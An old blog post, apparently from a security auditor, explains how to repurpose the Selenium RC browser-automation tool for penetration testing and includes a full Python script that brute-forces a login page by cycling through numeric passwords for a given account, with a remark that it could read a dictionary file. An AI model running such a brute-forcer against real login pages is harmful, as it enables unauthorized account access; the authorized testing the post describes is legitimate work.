This blog has moved!

If you are not automatically redirected to the new address, please direct your browser to
http://www.juxtaservices.com/blog/
and update your bookmarks.

Tuesday, April 17, 2007

Securing the World One Way or Another - Penetration Testing Using Selenium


Security is a big area of interest for me as techie. There's just nothing like the feeling you get by crafting some clever mechanism to bypass someone's (usually poor) attempts at security, or the exhilaration of successfully tweaking something to make it work other than the way it was intended. On the flip side, it is really a pretty crappy feeling when something has been hacked and you are the one who has to figure out how and create a damage report. I would much rather see things secured from the get-go.

That said, I wanted to share a new tool that I discovered and implemented the other day to do some brute force penetration testing on a website that I was auditing. It is actually a tool used to automate UI testing of web based applications, and was shown to me by a QA buddy of mine. It's called Selenium and is a piece of open-source software built in Java.

There are actually several components to the selenium package that make it a really great automated testing suite. The first of these is called Selenium IDE, and it runs as a firefox plugin allowing you to record and edit selenium test scripts. This is really slick for creating quick and dirty web app tests. There is also another tool called Selenium RC which is what I ended up using for my penetration testing. From the about page: "Selenium Remote Control is a test tool that allows you to write automated web application UI tests in any programming language against any HTTP website using any mainstream JavaScript-enabled browser." That pretty much sums up this glorious piece of software.

To run it, you just fire up the java server process, and then run a test script written one of a number of common scripting languages (that utilizes one of the corresponding selenium interface objects for that language) and the script will fire up a browser and run your tests on the target URL. Languages with current support include Java, .NET, Perl, PHP, Python, and Ruby. There is even support for SSL sites through the clever use of some proxy techniques.

The script I used for my testing was written in python and basically just accessed the target login page, iterating through a list of passwords until it found one that logged in successfully. Since security was very minimal, it didn't take long to succeed. The script itself was very simple as well as you can see:


from selenium import selenium
import unittest, os, time

class Cracker(unittest.TestCase):
def setUp(self):
self.selenium = selenium("localhost", 4444, "*firefox /usr/lib/firefox/firefox-bin", "http://www.targeturl.com")
self.selenium.start()

def test_new(self):
sel = self.selenium

user="bryce@targeturl.com"

for i in range(100, 999):
sel.open("/login.aspx")
sel.type("username", user)
sel.type("password", i)
sel.click("Button1")
sel.wait_for_page_to_load("30000")

#time.sleep(1)

if sel.is_text_present("Your login credentials were not correct. Please try again"):
print "Failed, trying password: " + str(i)
else:
print "Success, your password is: " + str(i)
break


def tearDown(self):
self.selenium.stop()

if __name__ == "__main__":
unittest.main()


The password domain in this case was fairly small (100-999), but this script could easily be altered to read in a dictionary file or a programmatic list of brute force passwords. With the Selenium RC server process running, all I had to do was fire off the python script (python hackscript.py) and away it ran.

The server can be a little tricky to get running, but I found the instructions in the Tutorial and Troubleshooting Guide to solve any problems I encountered. (If you are running in Linux and you have to update your firefox-bin path, don't forget to reload the PATH variable using 'source ~/.bash_profile). If you would like to run the latest version (this may be necessary if you are using Firefox higher than 2.0) you can find the server.jar file here. Just replace it in the unzipped structure and you should be set.

0 Comments:

Post a Comment

<< Home